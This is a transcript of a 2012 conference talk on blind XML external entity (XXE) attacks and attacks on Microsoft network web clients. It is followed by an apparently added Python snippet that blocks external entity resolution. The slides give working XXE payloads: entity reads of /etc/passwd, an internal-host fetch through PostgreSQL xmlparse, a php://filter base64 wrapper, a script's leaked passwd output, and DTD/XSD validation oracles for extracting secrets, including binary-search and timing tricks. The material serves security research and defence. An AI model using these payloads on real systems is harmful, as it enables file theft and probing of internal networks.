ONsec PHDays 2012 XXE incapsulated report
PHDays report. Attacks on MS clients and blind XXE exploitation, encapsulated report. D0znpp. ONsec
Presentation Transcript

  • Attacks against Microsoft network web clients
    PHDays, Russia, Moscow, 31/05/2012
  • Author bio
    @d0znpp, d0znpp@onsec.ru
    • Engaged in research in the field of web application security since 2004;
    • Founder and security expert of the ONsec company (since 2009);
    • Nowadays: development of self-learning systems for the detection of attacks on web applications and heuristic analysis.
  • MS network under attack
    • Trusted domain
    • Same Origin Policy on trusted domain
    • Local network area
    • Security policy
    • Bypass "no-proxy for local addresses"
    • Profit
  • Blind XXE exploitation
    PHDays, Russia, Moscow, 31/05/2012
  • Good morning. Wake up, 0day
    PostgreSQL all versions (8.4.11 debian 4.4.5-8 tested)
      xmlparse(document '<!DOCTYPE c [ <!ENTITY a SYSTEM "http://172.28.202.20/">]><c>&a</c>');
  • Good morning. Wake up, 0day
    PostgreSQL all versions (8.4.11 debian 4.4.5-8 tested)
    No way to read content from the entity, but…
      ERROR: invalid XML document
      ПОДРОБНО: http://172.28.202.20/:1: parser error : StartTag: invalid element name
      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x^
      http://172.28.202.20/:139: parser error : AttValue: " or expected
      <img src=http://seclog.ru/main/logo.php width=0 height=0/>
  • XXE basics
    Parser bug (feature)
    • To read local files
    • To make DoS (by reading /dev/zero loops)
      <?xml encoding=utf-8 ?><!DOCTYPE a [<!ENTITY e SYSTEM /etc/paswd> ]><a>&e;</a>
  • XXE applications
    • Local files
    • Internal network resources
    • Port scan (http://192.168.0.1:22/)
    • MS Windows network resources (adC$)
    • Wrappers (ldap:// in Perl, expect://, ssh2://, etc.)
  • Classic XXE vuln
    • Based on web application error messages, such as:
      "Unknown language DATA"
      "Login DATA are not valid"
      "Password for user DATA does not match"
    • Cannot read files containing invalid characters, such as 0x02, <, >, etc.
  • Vuln which won a "Month of Yandex bugs hunting" contest
      $ ./xxe-direct.pl --file="/etc/passwd"
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:namesp2="http://namespaces.soaplite.com/perl" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:namesp84="http://xml.apache.org/xml-soap" xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body><SOAP-ENV:Fault>
      <faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode>
      <faultstring xsi:type="xsd:string">Unknown language</faultstring>
      <detail xsi:type="xsd:string">Unknown language
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      bin:x:2:2:bin:/bin:/bin/sh
      sys:x:3:3:sys:/dev:/bin/sh
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/bin/sh
  • What is wrong?
    • Webapp may not display error messages
    • You may want to get XML file contents in Java. Interesting XMLs: web.xml, tomcat-users.xml, jetty.xml, http.conf (malformed)
  • PHP way to read anything
    • PHP wrappers provide filter functionality:
      php://filter/convert.base64-encode/resource=web.xml
    • Error messages still need to be displayed
  • What is blind?
    • Use DTD and XSD validations
    • Get a validation result (status or errors)
    • Use bruteforce, regexp, binary search and error message information (error-based) to read external XML structure and data
  • DTD based attack formula
      XMLinp = DTDint + XMLint + XMLext
      V(XMLinp, DTDint) = V(XMLint, DTDint) && V(XMLext, DTDint)
    XMLinp – input XML stream
    DTDint – internal DTD schema
    XMLint – internal XML structure
    XMLext – external XML (XML to read)
    V(xml, schema) – validation function, which returns a validation status (error message or boolean)
  • DTD based attack: from idea to schema
    Web.xml:
      <?xml version="1.0" ?>
      <secret>
        <any>
          data
        </any>
      </secret>
    Input.xml:
      <?xml version="1.0"?>
      <!ENTITY ext SYSTEM "web.xml">
      <!ELEMENT root (secret+)>
      <!ELEMENT secret (any+)>
      <!ELEMENT any (#PCDATA)>
      <root>
        &ext;
        <secret><any>data</any></secret>
      </root>
    Result: XML validation error
  • Example #1. Read attribute value
      <!ATTLIST key id (a|b) #REQUIRED >
      <key id="secret"></key>
    Value "secret" for attribute id of mountain is not among the enumerated set in // LibXML
    Attribute "key" with value "secret" must have a value from the list "a b ". // Xerces
  • Example #2. Brute external XML tag
      <!ENTITY a SYSTEM "web.xml"><!ELEMENT ext (root+)>]><ext>&a;</ext>
    --> OK
      <!ENTITY a SYSTEM "web.xml"><!ELEMENT ext (foobar+)>]><ext>&a;</ext>
    --> Element ext content does not follow the DTD, expecting (root)+, got (CDATA ) // LibXML PHP
  • Example #3. Read external XML (Java)
      factory.setValidating(true); // SAXParserFactory or DocumentBuilderFactory
      <!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM 'web.xml'>]><root>&a;</root>
    Element type "bar" must be declared.
    Where is the "bar" tag? "bar" is in web.xml!
  • Problems of DTD based attacks
    • Example #3 doesn't work in LibXML PHP ;( Only the first tag name can be read (Example #2) from the DOM object in PHP (library's bug).
    • DTD can't be used to determine tag values (only tag names, document structure and attribute values)
    • Bruteforce required if errors are not displayed
    • Malformed XML such as http.conf can't be read
  • XSD based attack formula
      XMLinp = DTDinp + XSDinp + XMLint + XMLext
      V(XMLinp, DTDinp, XSDinp) = V(XMLint, DTDinp, XSDinp) && V(XMLext, DTDinp, XSDinp)
    XMLinp – input XML stream
    DTDinp – input DTD schema
    XSDinp – input XSD schema
    XMLint – internal XML structure
    XMLext – external XML (XML to read)
    V(xml, dtd, xsd) – validation function, which returns a validation status (error message or boolean)
  • XSD based attack: from idea to schema
    Web.xml:
      <?xml version="1.0" ?>
      <secret>
        <any>
          data
        </any>
      </secret>
    Input.xml:
      <?xml version="1.0"?>
      <!ENTITY ext SYSTEM "web.xml">
      <root xsi:noNamespaceSchemaLocation="http://myhost/int.xsd">
        &ext;
        <secret><any>data</any></secret>
      </root>
    Result: XML validation error
  • Example #4. Read tag values (XSD)
      parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage", "http://www.w3.org/2001/XMLSchema"); // SAXParserFactory or DocumentBuilderFactory
      <!ENTITY ext SYSTEM "web.xml">
      <contacts xsi:noNamespaceSchemaLocation="int.xsd">
      <xs:element name="password" type="xs:int"/>
    cvc-datatype-valid.1.2.1: 'Secret' is not a valid value for integer.
    cvc-type.3.1.3: The value 'Secret' of element 'password' is not valid. // Xerces
  • Binary search basics
    a-n? m-z? a-h? a-e? h-n?
  • Faster binary search
    • Phonetic chains
    • Probability with which one letter follows another one
    • Based on phonetic features of languages
    • Can be used to make text reading by binary search faster
    http://exploit-db.com/papers/13969/
  • Example #5. Binary search for tag value (XSD)
      <xs:element name="password" type="PWD"/>
      …
      <xs:simpleType name="PWD">
        <xs:restriction base="xs:token">
          <xs:pattern value="[a-m]{1}[a-z]+"/>
        </xs:restriction>
      </xs:simpleType>
    If the first character of the password tag value is between "a" and "m", validation will be true, else false
  • And what about attacks without validation status?
    • Use something like time-based attacks!
    • The XSD parser validates all tags even if some of them are already invalid
    • Parser != Interpreter
    • What can we do in that case?
  • Example #6. 2blind attacks
      <xs:element name="secret">
        <xs:complexType>
          <xs:choice>
            <xs:group ref="conditionGrp"/>
            <xs:group ref="highloadGrp"/>
          </xs:choice>
        </xs:complexType>
      </xs:element>
    If the value of the secret tag matches conditionGrp, the parser doesn't execute the regexp from highloadGrp. So you should make the highloadGrp regexp really difficult ;)
  • Problems of XSD based attacks
    • Internal XSD validation is rare in the wild
    • Only 4% of all webapps with XXE vulns do that*
    • Cannot be used to read malformed XML, such as httpd.conf
    * By our stats from security audits since 2009
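Every oracle on these slides, DTD-based or XSD-based, depends on one precondition: the parser resolves the external entity (&ext;) before validating. The following is an added example, not from the slides or from ONsec, showing how a service can close that precondition with Python's standard-library expat parser: record any DTD construct, and abort the parse instead of fetching an external entity, so the caller receives neither the referenced content nor a validation verdict. The XxeGuard class, the inspect helper, the sample documents and the placeholder host xxe-host.invalid are all constructed for this example.

```python
import xml.parsers.expat

# Constructed samples (not from the slides). PROBE mirrors the shape of the
# DOCTYPE + SYSTEM entity documents on the page, aimed at a placeholder host.
PROBE = b'<!DOCTYPE c [ <!ENTITY a SYSTEM "http://xxe-host.invalid/"> ]><c>&a;</c>'
INTERNAL_ONLY = b'<!DOCTYPE c [ <!ENTITY a "x"> ]><c>&a;</c>'
BENIGN = b'<root><secret><any>data</any></secret></root>'

class XxeGuard:
    """Expat gate: records DTD constructs and refuses to resolve external entities.
    Returning 0 from ExternalEntityRefHandler aborts the parse, so the caller gets
    neither the referenced content nor a usable validation verdict (the oracle)."""

    def __init__(self):
        self.findings = []
        p = xml.parsers.expat.ParserCreate()
        p.StartDoctypeDeclHandler = self._on_doctype
        p.EntityDeclHandler = self._on_entity
        p.ExternalEntityRefHandler = self._on_external_ref
        # Also never load an external DTD subset or expand parameter entities.
        p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
        self._parser = p

    def _on_doctype(self, name, sysid, pubid, has_internal_subset):
        self.findings.append(f"DOCTYPE {name} (system id {sysid!r}, "
                             f"internal subset {bool(has_internal_subset)})")

    def _on_entity(self, name, is_pe, value, base, sysid, pubid, notation):
        kind = "parameter" if is_pe else "general"
        origin = "external" if sysid is not None else "internal"
        target = f" -> {sysid}" if sysid is not None else ""
        self.findings.append(f"{origin} {kind} entity {name}{target}")

    def _on_external_ref(self, context, base, sysid, pubid):
        self.findings.append(f"blocked external entity fetch: {sysid}")
        return 0  # tell expat to fail the parse rather than resolve the reference

    def inspect(self, data):
        """Return (accepted, findings); accepted only if it parsed with no DTD use."""
        try:
            self._parser.Parse(data, True)
        except xml.parsers.expat.ExpatError as exc:
            self.findings.append(f"parse aborted: {exc}")
            return False, self.findings
        return not self.findings, self.findings

def inspect(data):
    return XxeGuard().inspect(data)  # one fresh guard per document
```

The findings list is what a service should log for detection; the boolean is all the client should ever see, which removes both the direct read and the blind validation oracle the slides describe.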
  • ???
    PHDays, Russia, Moscow, 31/05/2012
    @d0znpp, d0znpp@onsec.ru